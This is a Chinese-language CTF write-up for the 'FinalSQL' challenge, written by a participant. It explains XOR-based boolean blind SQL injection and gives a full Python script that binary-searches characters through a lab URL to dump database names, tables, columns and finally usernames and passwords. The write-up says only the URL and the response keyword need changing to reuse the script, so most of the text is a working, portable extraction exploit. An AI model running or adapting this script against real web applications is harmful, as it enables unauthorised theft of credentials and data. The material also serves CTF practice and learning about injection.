盲注脚本爆数据库之[极客大挑战 2019]FinalSQL

知识点：

当过滤的东西很多很多的时候，可以考虑盲注，用 ^ 来判断是否可以进行脚本注入；

1^1^1=0  1^1^0=1;

以爆库名为例：

ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d

使用二分法查找数据库的每一个字母；具体脚本如下：

到时候只需要改回显的关键字和url就行

import requests
import time

url = "http://03251dcb-c0cc-4894-97d2-a9510b3705ab.node4.buuoj.cn:81/search.php"
temp = {"id": ""}
column = ""
for i in range(1, 1000):
    time.sleep(0.06)
    low = 32
    high = 128
    mid = (low + high) // 2
    while (low < high):
        # 库名
        # temp["id"] = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" %(i,mid)
        # 表名
        # temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)^1" %(i,mid)
        # 字段名
        # temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" %(i,mid)
        # 内容
        temp["id"] = "1^(ascii(substr((select(group_concat(id,username,password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)
        r = requests.get(url, params=temp)
        time.sleep(0.04)
        print(low, high, mid, ":")
        if "Click" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if (mid == 32 or mid == 127):
        break
    column += chr(mid)
    print(column)

print("All:", column)

#